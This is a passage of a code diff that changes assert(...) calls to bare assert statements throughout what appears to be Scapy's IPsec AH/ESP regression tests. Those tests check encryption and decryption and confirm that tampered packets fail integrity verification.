+2686,7 @@ e.dst = '4.4.4.4' * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2706,13 +2706,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2722,7 +2722,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d == p) +assert d == p ####################################### = IPv4 / AH - Tunnel - SHA2-256-128 - altered packet @@ -2740,13 +2740,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e.dst = '4.4.4.4' @@ -2754,7 +2754,7 @@ e.dst = '4.4.4.4' * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2774,13 +2774,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2790,7 +2790,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d == p) +assert d == p ####################################### = IPv4 / AH - Tunnel - SHA2-384-192 - altered packet @@ -2808,13 +2808,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e.dst = '4.4.4.4' @@ -2822,7 +2822,7 @@ e.dst = '4.4.4.4' * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2842,13 +2842,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2858,7 +2858,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d == p) +assert d == p ####################################### = IPv4 / AH - Tunnel - SHA2-512-256 - altered packet @@ -2876,13 +2876,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e.dst = '4.4.4.4' @@ -2890,7 +2890,7 @@ e.dst = '4.4.4.4' * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2910,13 +2910,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2926,7 +2926,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d == p) +assert d == p ####################################### = IPv4 / AH - Tunnel - HMAC-MD5-96 - altered packet @@ -2944,13 +2944,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e.dst = '4.4.4.4' @@ -2958,7 +2958,7 @@ e.dst = '4.4.4.4' * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -2978,13 +2978,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -2994,7 +2994,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d == p) +assert d == p ####################################### = IPv4 / AH - Tunnel - AES-CMAC-96 - altered packet @@ -3012,13 +3012,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e.dst = '4.4.4.4' @@ -3026,7 +3026,7 @@ e.dst = '4.4.4.4' * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3047,13 +3047,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.ttl = 2 @@ -3063,7 +3063,7 @@ d = sa.decrypt(e) d * after decryption the original packet should be unaltered -assert(d == p) +assert d == p ####################################### = IPv4 / AH - Tunnel - AES-CMAC-96 - altered packet -- ESN @@ -3082,13 +3082,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e.dst = '4.4.4.4' @@ -3096,7 +3096,7 @@ e.dst = '4.4.4.4' * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3120,19 +3120,19 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Transport - AES-CBC - NULL @@ -3150,20 +3150,20 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Transport - NULL - HMAC-SHA1-96 @@ -3181,19 +3181,19 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Transport - NULL - HMAC-SHA1-96 - altered packet @@ -3211,13 +3211,13 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -3225,7 +3225,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3245,20 +3245,20 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Transport - AES-CBC - HMAC-SHA1-96 - altered packet @@ -3276,14 +3276,14 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -3291,7 +3291,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3311,20 +3311,20 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Transport - AES-GCM - NULL - altered packet @@ -3342,14 +3342,14 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -3357,7 +3357,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3378,20 +3378,20 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Transport - AES-CCM - NULL - altered packet @@ -3410,14 +3410,14 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -3425,7 +3425,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3447,20 +3447,20 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Tunnel - AES-CBC - NULL @@ -3479,21 +3479,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Tunnel - NULL - HMAC-SHA1-96 @@ -3512,20 +3512,20 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Tunnel - NULL - HMAC-SHA1-96 - altered packet @@ -3544,14 +3544,14 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -3559,7 +3559,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3580,21 +3580,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Tunnel - AES-CBC - HMAC-SHA1-96 - altered packet @@ -3613,15 +3613,15 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -3629,7 +3629,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3650,21 +3650,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Tunnel - AES-GCM - NULL - altered packet @@ -3683,15 +3683,15 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) +assert isinstance(e, IPv6) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -3699,7 +3699,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3721,20 +3721,20 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IPv6) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / ESP - Tunnel - AES-CCM - NULL - altered packet @@ -3754,14 +3754,14 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == 'aa::bb' and e.dst == 'bb::aa') -assert(e.nh == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IPv6) +assert e.src == 'aa::bb' and e.dst == 'bb::aa' +assert e.nh == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].seq += 1 @@ -3769,7 +3769,7 @@ e[ESP].seq += 1 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3792,13 +3792,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' * the encrypted packet should have an AH layer -assert(e.nh == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.nh == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * alter mutable fields in the packet e.hlim = 2 @@ -3808,7 +3808,7 @@ d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv6 / AH - Transport - HMAC-SHA1-96 - altered packet @@ -3825,13 +3825,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') +assert isinstance(e, IPv6) +assert e.src == '11::22' and e.dst == '22::11' * the encrypted packet should have an AH layer -assert(e.nh == socket.IPPROTO_AH) -assert(e.haslayer(AH)) -assert(e.haslayer(TCP)) -assert(e[AH].spi == sa.spi) +assert e.nh == socket.IPPROTO_AH +assert e.haslayer(AH) +assert e.haslayer(TCP) +assert e[AH].spi == sa.spi * simulate the alteration of the packet before verification e[TCP].dport = 46 @@ -3839,7 +3839,7 @@ e[TCP].dport = 46 * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -3858,13 +3858,13 @@ sa = SecurityAssociation(AH, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IPv6)) -assert(e.src == '11::22' and e.dst == '22::11') +assert isinstance(e, IPv6) 